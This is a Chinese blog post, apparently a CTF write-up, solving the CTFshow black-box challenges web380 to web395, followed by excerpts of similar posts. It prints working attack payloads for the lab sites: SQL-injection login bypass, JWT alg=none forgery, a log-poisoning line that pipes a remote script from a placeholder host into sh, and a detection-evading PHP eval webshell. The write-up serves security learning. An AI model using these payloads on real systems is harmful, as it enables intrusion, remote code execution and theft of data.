CTFshow 黑盒测试

最新推荐文章于 2024-07-06 17:55:07 发布
最新推荐文章于 2024-07-06 17:55:07 发布
阅读量618 收藏
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/starttv/article/details/128157370
版权

目录

web380-dirsearch扫目录

简单的看了一下,没有发现可以交互的地方,先扫描一下目录吧

python3 dirsearch.py -u http://1b98d9d4-b675-40d5-8822-202d7fa11ace.challenge.ctf.show/

扫描出两个目录flag.php和page.php。

先访问flag.php为空,查看源代码为空。

访问page.php,出现报错,应该需要传一个id参数,访问对应的php文件。

Notice: Undefined index: id in /var/www/html/page.php on line 16
打开$id.php失败

Payload:

右键查看源代码即可获得flag

http://1b98d9d4-b675-40d5-8822-202d7fa11ace.challenge.ctf.show/page.php?id=flag

web381-源码找后台

界面跟上题差不多,先扫目录,还是page.php,不过没扫出来flag.php,上题的思路行不通。

检查源代码发现一个奇怪的目录,alsckdfy,访问试试,得到flag。

<link rel="stylesheet" href="layui/css/layui.css">
<link rel="stylesheet" href="layui/css/global.css">
<link rel="stylesheet" href="alsckdfy/layui/css/tree.css">

web382-sql注入

按照上题思路获得后台地址后,尝试登录

Payload:

一句话搞定

1' or 1=1#

web383-sql注入+

用上面的payload即可

web384-sql注入++

根据提示密码前两位为小写字母,后三位为数字

字典生成脚本

import string
s1=string.ascii_lowercase
s2=string.digits
f=open('dict.txt','w')
for i in s1:
	for j in s1:
		for k in s2:
			for l in s2:
				for m in s2:
					p=i+j+k+l+m
					f.write(p+"\n")
f.close()

用户名我们就默认为admin,爆出来的密码为xy123。

web385-敏感文件

扫目录发现/install

请务必在安装成功后删除本文件
需要重新安装请访问install/?install,管理员密码将重置为默认密码

在382中我们可以sql注入,查询数据库发现用户名密码为admin:admin888,猜测admin888就是默认密码。

web386-敏感文件+

扫描目录发现clear.php,直接访问显示清理完成,猜测有个参数指定要清理的文件。

/clear.php?file=index.php

再次访问index.php发现文件已被删除,我们将lock.dat文件删除即可,后续步骤与上题一致。

Payload:

/clear.php?file=./install/lock.dat

web387-日志包含

扫描目录发现robots.txt

disallow:/debug

访问/debug显示file not exit,根据前面几题的经验猜测需要传file参数

/debug/?file=/var/log/nginx/access.log

发现日志包含成功,反弹shell,在check.php中发现flag。

User-Agent:<?php system('curl https://your-shell.com/xxxx:6666 | sh');?>

web388-日志包含+

这题对写日志做了一些限制,但反弹shell依然可以成功,与上题一样。

web389-JWT伪造(非预期)

将alg改为none,sub改为admin,这样的话就不需要校验签名了。

脚本:

import jwt
 
# payload
token_dict = {
  "iss": "admin",
  "iat": 1669958188,
  "exp": 1669965388,
  "nbf": 1669958188,
  "sub": "admin",
  "jti": "9859b26b89e203ab6f26445677c1e933"
}
# headers
headers = {
  "alg": "none",
  "typ": "JWT"
}

jwt_token = jwt.encode(token_dict,  # payload, 有效载体 
					 key='',
                       headers=headers,  # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
 					   algorithm="none",  # 指明签名算法方式, 默认也是HS256
                       ).decode('ascii')  # python3 编码后得到 bytes, 再进行解码(指明解码的格式), 得到一个str

print(jwt_token)

Payload:

若在网站根目录写入1.html会重定向,我们可以将2.html写入/alsckdfy/目录下即可正常访问

User-Agent : <?php system('cat /var/www/html/alsckdfy/check.php > /var/www/html/alsckdfy/1.html');?>

web390-做法与上题一致

web391-做法与上题一致

由于389开始用的都是非预期的解法,所以步骤都一样,想看预期解可以去b站看群主的视频。

web392-预期解

flag不在check.php中,换思路。

扫/alsckdfy/目录发现存在/alsckdfy/editor/,打开发现是Kindeditor编辑器。

kindeditor编辑器版本小于4.1.5存在文件上传漏洞,可利用该漏洞上次网页、文本文件。

上传一句话木马,后缀修改为.zip

<?php
#这样写起到了免杀的效果
$s='<?ph'.'p ev'.'al($_PO'.'ST[1])'.';?>';
file_put_contents('/var/www/html/2.php',$s);
?>

上传成功后编辑器会返回上传路径,利用返回的路径去dubug进行文件包含。

/debug/?file=/var/www/html/alsckdfy/attached/file/20221202/20221202082119_17656.zip

web393-同上

web394-同上

解法一样,不过flag不在根目录了,在check.php中。

web395-同上

总结:

很多题我都用了同一种解法,其实题目的解法有好几种,sql注入,文件包含,SSRF都可以使用。

本文章仅做参考。

Sn_u
关注
ctfshow__黑盒测试
qq_45655564的博客
07-04 424
web380-测试url参数 一开始什么也没有发现可以注入的地方,于是研究url参数。 发现每个页面都带有参数,如page_1.php,page_2.php啥的。 但是还是没有发现什么问题。 于是看了看别人的wp,发现page.php。 进去之后发现 $id.php很有问题。于是试了一下$id可不可以get传参进去,穿了一个page_1发现可以,于是试了一下另id=flag于是发现了flag web381-找后台 进去之后发现是同样的模板,于是继续查看page.php,结果发现了这个 这个想了想是没
【CTFSHOW】web入门 黑盒测试
7ruth0hn的博客
09-29 1578
文章目录写在前面web380web381web382web383web384web385web386web387web388web389web390web391web392web393web394web395参考资料 写在前面 一直没搞过渗透,先学学黑盒测试web380 进入题目发现是一个关于灯泡的悲伤故事,点进去,看到跳转到page_1.php页面。 我们访问page.php试试: 发现报错:$id.php,可以猜想需要传名称为id的参数,来访问id.php。我们访问page.php?id=1试试
ctfshow黑盒测试
qq_61768489的博客
01-28 781
在search.php这里使用堆叠注入来实现向link表中添加url,我们已知三个字段,并且id控制选择页面。与上题一样,不一样的点在于这题将file字符ban了,可以利用16进制0x绕过。link表里的第三个字段是url,也就认为是搜索引擎那里跳转的url。这里可以利用ssrf可以添加跳转页面即url字段,比如添加。现在的目的应该是删除这个lock.dat然后重置密码。这里传入什么参数也是靠黑盒来猜了,用file参数。$id应该是传的参数,是php的文件名。search.php的注入点,跑不出。
CTFshow——黑盒测试
D.MIND 的博客
08-14 668
文章目录380381382、383384385386387388389390391、392393394、395 380 扫描一个目录,发现page.php,打开发现提示缺少id参数,且id参数控制php文件的打开,直接/page.php?id=flag即可 381 在首页源码中有可疑的路径,一层层打开看就发现flag了 382、383 两题依旧是访问后台:/alsckdfy/,弹出一个登陆界面,在账号处有SQL注入,admin'||1#即可登入 最后还是弱密码爆破一下,账密是admin:admin888
ctfshow 黑盒测试web380-395 wp
m0_50936156的博客
04-22 417
目录web 380web 381web 381,382web 383-386web 387web 49web 50web 51web 52 记录下学习内容 web 380 开启题目,一个小型网站,四处浏览,没半点头绪,后来想到了目录扫描,结果线程最大为5否则504,看其他师傅的wp 有一个page.php页面 打开$id.php失败 猜到是file_get_contents,id传入page,出现关键部分 $html = file_get_contents('page_'.$id.'.php');
ctfshow黑盒测试
09-29
在ctfshow黑盒测试中,引用的代码片段提供了一些关于渗透测试中可能出现的问题和解决方案的信息。根据引用中的代码,黑名单功能被用于检测用户输入中是否包含某些禁止的关键词。根据引用和引用中的描述,测试者试图...
ctfshow 黑盒测试
09-03
在CTFShow中,黑盒测试可能是其中的一类题目类型,参赛者需要通过对目标系统的输入输出进行分析和测试,利用系统漏洞或弱点来获取敏感信息或攻击系统。 需要注意的是,黑盒测试在合法授权和合规范围内进行,不得...
ctfshow-web入门-黑盒测试web380-386)
i_kei的博客
01-11 1281
鸣谢 感谢ctfshow平台对本栏目的大力支持(皮一下很开心) web380 打开页面之后,分析了网页源码,翻了半天css,什么都没找到 后来经过太空人师傅提示page.php,打开看看 提示打开$id.php失败,构造page.php?id=flag,查看源码发现flag web381 看了一晚上源码,愣是没发现这个目录,我醉了 访问/alsckdfy/即可获得flag web382 继续打开后台 第一种解法: 万能密码登录 例: admin 'or ‘1’=‘1’# 登录即可拿到flag 第
ctfshow_黑盒测试
qq_45951598的博客
12-22 590
文章目录WEB38WEB39web40web41 WEB38 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag WEB39 这里爆出了路径,直接访问获取flag。 web40 这里和上一题一样,但是多了一个弱密码. web41 ...
php黑盒测试,CTFSHOW黑盒测试
weixin_42573113的博客
03-28 386
文章目录web380payload后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。page.php?id=flagweb381payload地址在源码里面web382、383还是上面的地址,万能密码登录得到flagweb384字典生成import strings1=string.ascii_lowercases2=string.digitsf=open('dict...
ctfshow web入门 黑盒测试
2301_81040377的博客
05-20 882
扫后台但是其实dirsearch自带的字典是没有的我们可以添加一下。访问clear.php然后发现并没有删除,原来是需要传参才可以删除。我是直接填的账号密码,至于账号为什么是admin我猜的。这些文件挨个试发现啥也没,最后仔细对比发现其实都是。进入页面发现有标题搜索了随便搞一个拿到注入点。这里有个菜鸟往事点进来就可以知道注入点。密码前2位是小写字母,后三位是数字。但是还有一种方法是万能密码。访问debug发现权限不足。但是没啥用哇,查看源代码。这里文章看的我好有感触。可以和上题一样直接秒了。
ctfshow之黑盒测试380-395
qq_50589021的博客
09-15 803
前言 总结黑盒测试思路 可能用到的字典 xy123 admin888 /install/index.php /clear.php /page.php /alsckdfy/index.php /debug web380——测试URL参数 web381——找后台 web382、383——sql万能密码 web384——爆破 开始过滤 爆破 字典生成: import string s1=string.ascii_lowercase # 小写字母a-z s2=string.digits # 数字 f=op
ctf.show黑盒测试(web380-381)
wanan的博客
08-31 636
ctf.show黑盒测试(web380-381)
CTFSHOW黑盒测试
羽的博客
01-15 2007
文章目录web380web381web382、383web384web385web386web387388web389web390web391web392web393 web380 payload 后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。 page.php?id=flag web381 payload 地址在源码里面 web382、383 还是上面的地址,万能密码登录得到flag web384 字典生成 import string s1=string.asci
CTFshow刷题日记-WEB-黑盒测试web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3198
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
ctfshow web入门 nodejs web338--web344
最新发布
2301_81040377的博客
07-06 758
Function环境下没有require函数,不能获得child_process模块,我们可以通过使用process.mainModule.constructor._load来代替require。然后我们利用这个来使用copy来实现属性的污染把,secret的ctfshow属性变为36dboy。和后面的 var __tmp2 不能删,是为了闭合代码。由于是污染题,所以我靶机是开了差不多十来次,终于是拿到了。源码和340没有变,但是没有api的函数触发了。污染之后没有反应,随便访问一个页面,反弹成功。
[CTFSHOW][WEB入门]nodejs部分WP
Y4tacker的博客
12-27 3697
文章目录前言web334web335web336方法一方法二方法三web337 前言 nodejs从入门到挖坟,今天早上刚刚学了一点,成功了,比较开心 web334 下载源码下来在user.js里面发现了用户名和密码,群主比较坑哈,搞了个大写,明明是小写,ctfshow与密码我忘了压缩包懒得下 web335 一道Node.JS的RCE 之后cat fl00g.txt即可 web336 方法一 先用上一题paylaod 尝试绕过姿势,也不行 那么试一下读取下文件呢,看看过滤了啥,通过全局变量读取当前目
CTFshow-WEB入门-node.js
feng的博客
04-01 2166
前言 刚学了2天的node.js,我还是太菜了官方文档看的太懵,听学长说node.js的漏洞就那些,不用那么专注的学习。但是考虑到我对于javascript和node.js都实在不太懂,因此打算一遍做题,一遍学node.js的基础知识。 web334 主要关注这段代码: var findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值